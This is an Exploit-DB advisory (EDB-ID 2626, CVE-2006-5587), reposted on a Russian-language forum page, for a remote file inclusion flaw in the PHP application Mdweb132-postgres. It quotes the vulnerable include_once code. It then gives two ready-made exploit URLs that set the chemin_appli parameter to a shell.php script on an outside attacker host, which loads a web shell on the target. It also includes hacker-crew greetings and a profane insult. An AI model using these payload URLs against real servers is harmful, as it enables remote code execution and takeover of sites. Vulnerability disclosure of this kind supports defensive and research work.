- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 2626
- Проверка EDB
-
- Пройдено
- Автор
- DRAGO84
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2006-5587
- Дата публикации
- 2006-10-23
Код:
###### ToXiC #########################
#
# Mdweb132-postgres: Remote File Inclusion by ToXiC CreW
#
# ToXic Security Italian CreW
# BuG FounD by Drago84
#
# Application Affect:
# Mdweb132-postgres
#
#
# Sorce Code:
# http://jc.desconnets.free.fr/mdweb/install/windows/mdweb132-postgres-sans-installeur.zip
#
#
# Page:
# form_org.inc.php
# country_insert.php
#
#
# Problem:
#
# // Inclusion du fichier pour l'initialisation et le chargement des étiquettes de chaque champ.
# include_once $chemin_appli."admin/inc/organisations/initLabelForm_org.inc.php";
# // Inclusion du fichier pour l'initialisation et le chargement du code HTML des champs de saisie.
# include_once $chemin_appli."admin/inc/organisations/initChampsForm_org.inc.php";
# // Inclusion du fichier pour l'écriture des fonctions Javascript de contrôle de saisie.
# include_once $chemin_appli."config/fonctions_ctrl_js.inc.php";
#
# Dir :
# /mdweb/admin/inc/organisations/
#
#
#
# ExPloit :
# http://www.site.com/Agora_PATH//mdweb/admin/inc/organisations/form_org.inc.php?chemin_appli=http://sonic-banda-di-lamer.gay/shell.php?
#
# http://www.site.com/Agora_PATH//mdweb/admin/inc/organisations/country_insert.php?chemin_appli=http://sonic-banda-di-lamer.gay/shell.php?
#
#
#
# GrEatZ All Member of ToXiC, Str0ke
#
#
# FUCK #Sonic
#
###### ToXiC #########
# milw0rm.com [2006-10-23]- Источник
- www.exploit-db.com
